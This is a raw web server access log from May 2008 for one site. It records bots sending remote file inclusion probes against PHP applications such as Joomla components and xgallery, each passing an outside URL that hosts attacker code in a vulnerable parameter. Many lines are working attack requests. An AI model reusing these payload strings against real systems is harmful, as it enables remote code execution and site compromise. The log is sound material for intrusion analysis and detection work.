212.116.174.9 - - [05/May/2008:09:33:55 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:33:59 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:34:07 -0700] "GET /avatar.php?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:34:17 -0700] "GET /index.php?incl=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.220.202.24 - - [05/May/2008:09:34:29 -0700] "GET /logs/access.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:34:44 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:34:44 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:34:44 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:34:48 -0700] "GET /logs//mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:34:49 -0700] "GET //mcf.php?content=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.91.118.150 - - [05/May/2008:09:34:50 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [05/May/2008:09:34:51 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.lapuntastudios.com/meser/administrator/components/com_joomla-visites/core/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "dmulk.com"
80.91.118.150 - - [05/May/2008:09:34:55 -0700] "GET /index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [05/May/2008:09:34:56 -0700] "GET /logs/index.php?pag=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:35:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:35:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:35:09 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:35:20 -0700] "GET /logs/access_080214.log//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:35:21 -0700] "GET //admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:35:21 -0700] "GET /logs//admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:35:46 -0700] "GET /logs/access_080131.log/index.php?pag=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:35:51 -0700] "GET /index.php?pag=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:09:35:53 -0700] "GET /logs/index.php?pag=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.138.217.3 - - [05/May/2008:09:36:41 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [05/May/2008:09:36:42 -0700] "GET /logs/access_080308.log//sitemap.xml//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:36:43 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [05/May/2008:09:36:46 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [05/May/2008:09:37:19 -0700] "GET //samPHPweb//common/db.php?commonpath=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:37:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:37:21 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:37:25 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:37:25 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:37:26 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:37:27 -0700] "GET /logs/access_080212.log/avatar.php?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:37:27 -0700] "GET /logs/avatar.php?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.7.147.137 - - [05/May/2008:09:37:39 -0700] "GET /logs//atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
196.7.147.137 - - [05/May/2008:09:37:39 -0700] "GET //atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:09:37:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:09:37:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:09:37:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [05/May/2008:09:37:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.70.125.187 - - [05/May/2008:09:37:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [05/May/2008:09:37:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:37:56 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:09:38:07 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:09:38:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [05/May/2008:09:38:08 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:38:35 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:09:38:36 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:38:42 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:38:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:09:38:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.242.220.51 - - [05/May/2008:09:38:49 -0700] "GET /logs//index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [05/May/2008:09:38:49 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:39:37 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:39:39 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:39:39 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:39:39 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:39:53 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:39:54 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:39:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:09:39:57 -0700] "GET /logs//index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:09:39:57 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:39:59 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.74.114 - - [05/May/2008:09:40:04 -0700] "GET /logs//index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [05/May/2008:09:40:05 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:40:08 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:09:40:09 -0700] "GET /logs//index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:09:40:11 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:40:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:40:26 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:40:29 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:40:33 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:40:36 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.141.186 - - [05/May/2008:09:40:46 -0700] "GET /logs//index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.141.186 - - [05/May/2008:09:40:46 -0700] "GET //index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:40:55 -0700] "GET /logs/access.log/index.php?incl=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:40:55 -0700] "GET /logs/index.php?incl=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.246.28 - - [05/May/2008:09:40:55 -0700] "GET /logs/access_080204.log/index.php?incl=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:41:30 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:41:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:52 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:52 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:53 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:53 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:54 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:41:54 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.198.133 - - [05/May/2008:09:41:58 -0700] "GET /logs//include.pcchess.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [05/May/2008:09:41:59 -0700] "GET //include.pcchess.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:09:42:01 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.198.133 - - [05/May/2008:09:42:06 -0700] "GET /logs//include.pcchess.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [05/May/2008:09:42:06 -0700] "GET //include.pcchess.php?mosConfig_absolute_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:42:13 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:09:42:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:42:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:42:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:43:28 -0700] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:36 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:38 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:39 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:42 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:09:43:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:44:11 -0700] "GET /logs/access_080205.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:44:12 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [05/May/2008:09:44:26 -0700] "GET /logs/access_080302.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
